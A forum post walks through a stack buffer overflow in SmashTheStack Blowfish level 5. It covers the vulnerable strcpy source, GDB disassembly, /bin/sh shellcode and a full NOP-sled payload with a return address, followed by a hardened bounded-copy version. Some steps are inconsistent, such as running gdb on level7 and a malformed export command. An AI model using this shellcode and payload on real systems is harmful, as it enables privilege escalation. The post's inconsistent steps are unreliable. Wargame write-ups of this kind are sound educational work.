[STS]Level 5 - Blowfish
  • chroniccommand
    Posts: 1,389
    Welcome to part five of my SmashTheStack blowfish guides.

    Preface
    In this level, we will be performing another overflow to escalate our privileges and read from the password file. We will be going into GDB, taking apart the program, finding memory addresses, setting environment variables and so on.

    Logging in
    Now for the second part of this level. Logging in so we can actually exploit it and get to the next level. Let's SSH to our box. You should be familiar with this.

    ssh level5@blowfish.smashthestack.org -p 2222
    password:

    1. Thou shalt NOT root or otherwise harm the box.
    2. Thou shalt NOT access any other network from this box.
    3. Thou shalt NOT use any other directory besides /tmp or /code for code.
    4. Thou shalt give the root pass to l3thal if you manage to change it.

    Passwords are in /pass.
    There is a README in each users home directory.
    /tmp && /var/tmp will be flushed daily by cron.
    Use /code plz for umm, code ;D
    IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
    The password for the last level will get you into
    Tux, the more advanced wargame. Join #blowfish on
    irc.smashthestack.org with any questions.

    Admins - l3thal && cr

    Forum: http://smashthestack.org/viewforum.php?id=10

    Last login: Thu Jan 28 23:09:50 2010 from host-84-222-52-125.cust-adsl.tiscali.it

    This level is another stack overflow in /levels/level5.
    Exploit to get the level6 pass from /pass/level6.

    So another overflow. How great. CD to the /levels directory and cat level5.c
    It should look like this:

    #include <stdio.h>
    #include <stdlib.h>   /* getenv, exit */
    #include <string.h>   /* strcpy */

    int main()
    {
        char buffer[1024];

        if (getenv("VULN") == NULL) {
            fprintf(stderr, "Try Again!!\n");
            exit(1);
        }

        /* unbounded copy: VULN may be longer than the 1024-byte buffer */
        strcpy(buffer, (char *)getenv("VULN"));

        printf("Environment variable VULN is:\n\"%s\".\n\n", buffer);
        return 0;
    }

    So we have a buffer of 1024, and we know it's vulnerable because it's using the outdated strcpy function to copy the buffer into the address.

    Analyze it
    So now's the part where we take it apart, and find out our info. To take the program apart, we will be using GDB. GDB is a Unix decompiler. But before we take it apart, we need to overflow it. If we perform the technique we have been doing with Perl, you find it won't work :/ But, we can use a different technique, using Python. To perform python commands via terminal type this:
    python -c <code>
    So we are going to export the variable of VULN using Python via command line. Try this code:
    ./level5 export VULN=$(python -c "print '\x90'*1040")

    Now you may be wondering what that \x90 character is. In assembler, this means NOP(No Operation), Basically meaning nothing. So we are going to export VULN to \x90(NOP) 1040 times. Now we can analyze the code.
    To take it apart, type this
    gdb level7

    This should open up the GDB command line with ./level7
    So now we take apart the main function. Type this:
    disass main

    It should look like this:

    Dump of assembler code for function main:
    0x08048484 <main+0>: push ebp
    0x08048485 <main+1>: mov ebp,esp
    0x08048487 <main+3>: sub esp,0x418
    0x0804848d <main+9>: and esp,0xfffffff0
    0x08048490 <main+12>: mov eax,0x0
    0x08048495 <main+17>: sub esp,eax
    0x08048497 <main+19>: mov DWORD PTR [esp],0x8048640
    0x0804849e <main+26>: call 0x8048364 <getenv@plt>
    0x080484a3 <main+31>: test eax,eax
    0x080484a5 <main+33>: jne 0x80484c8 <main+68>
    0x080484a7 <main+35>: mov DWORD PTR [esp+0x4],0x8048645
    0x080484af <main+43>: mov eax,ds:0x804979c
    0x080484b4 <main+48>: mov DWORD PTR [esp],eax
    0x080484b7 <main+51>: call 0x8048354 <fprintf@plt>
    0x080484bc <main+56>: mov DWORD PTR [esp],0x1
    0x080484c3 <main+63>: call 0x8048394 <exit@plt>
    0x080484c8 <main+68>: mov DWORD PTR [esp],0x8048640
    0x080484cf <main+75>: call 0x8048364 <getenv@plt>
    0x080484d4 <main+80>: mov DWORD PTR [esp+0x4],eax
    0x080484d8 <main+84>: lea eax,[ebp-0x408]
    0x080484de <main+90>: mov DWORD PTR [esp],eax
    0x080484e1 <main+93>: call 0x80483a4 <strcpy@plt>
    0x080484e6 <main+98>: lea eax,[ebp-0x408]
    0x080484ec <main+104>: mov DWORD PTR [esp+0x4],eax
    0x080484f0 <main+108>: mov DWORD PTR [esp],0x8048660
    0x080484f7 <main+115>: call 0x8048384 <printf@plt>
    0x080484fc <main+120>: mov eax,0x0
    0x08048501 <main+125>: leave
    0x08048502 <main+126>: ret
    End of assembler dump.

    If you know nothing of Assembler, this may look like nonsense to you. But if we analyze this memory address: 0x080484e1
    We see it's the strcpy function. So this is where we will be working. Now we set a breakpoint at that address.

    (gdb) break *0x080484e1
    Breakpoint 1 at 0x80484e1

    This is setting a breakpoint at that memory address now. Now let's take a look at the info registers.

    (gdb) i r
    eax 0xbfffd080 -1073753984
    ecx 0x4e 78
    edx 0x0 0
    ebx 0x3efff4 4128756
    esp 0xbfffd070 0xbfffd070
    ebp 0xbfffd488 0xbfffd488
    esi 0x8048510 134513936
    edi 0x80483c0 134513600
    eip 0x80484e1 0x80484e1 <main+93>
    eflags 0x246 [ PF ZF IF ]
    cs 0x73 115
    ss 0x7b 123
    ds 0x7b 123
    es 0x7b 123
    fs 0x0 0
    gs 0x33 51
    (gdb)

    As we can see we have the buffer's address in 0xbfffd080.
    If we set up the environmental variable to a string of 1038 bytes length we overwrite the 2 first bytes of the return
    address, so we have to write our shell in 1036 bytes and after that put the buffer's address.
    Use this shell code:
    \xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh

    And then:
    export VULN=$(python -c "print '\x90'*998 + '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh' + '\x90\xd0\xff\xbf'")

    And boom, we should have it ;)
    Read from /levels/level6 and you have the pass.

    --Chroniccommand
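As an added example (not part of the post above or of the wargame's own level5.c): the same program with the unbounded strcpy replaced by a length-checked copy, so a VULN value that does not fit in the 1024-byte buffer is rejected instead of running past it into the saved ebp and return address. The function names, BUF_SIZE macro and the memchr-based check are my own choices, not the level's code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1024   /* same buffer size as level5.c */

/* Hardened replacement for level5's strcpy(buffer, getenv("VULN")).
 * Copies src into dst only if the whole string, terminator included,
 * fits in dstsz bytes. Returns 0 on success, -1 if src is missing or
 * too long; on failure dst is left untouched, so the caller never holds
 * a half-copied, unterminated buffer. */
int copy_env_bounded(char *dst, size_t dstsz, const char *src)
{
    if (src == NULL || dstsz == 0)
        return -1;

    /* Look for the terminator only within the first dstsz bytes: an
     * oversized value is rejected without scanning the whole untrusted
     * string, and without ever reading past what we could store. */
    const char *nul = memchr(src, '\0', dstsz);
    if (nul == NULL)
        return -1;              /* no terminator in range: would overflow */

    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Mirrors level5's main(), but with the bounded copy. Takes the value
 * as a parameter so it can be exercised without touching the process
 * environment. Returns the exit status. */
int print_vuln(const char *value)
{
    char buffer[BUF_SIZE];

    if (copy_env_bounded(buffer, sizeof buffer, value) != 0) {
        fprintf(stderr, "VULN missing or longer than %zu bytes\n",
                sizeof buffer - 1);
        return 1;
    }
    printf("Environment variable VULN is:\n\"%s\".\n\n", buffer);
    return 0;
}

int main(void)
{
    return print_vuln(getenv("VULN"));
}
```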
  • Xin
    Posts: 3,251
    Nice tutorial keep it up bro :)
    Xin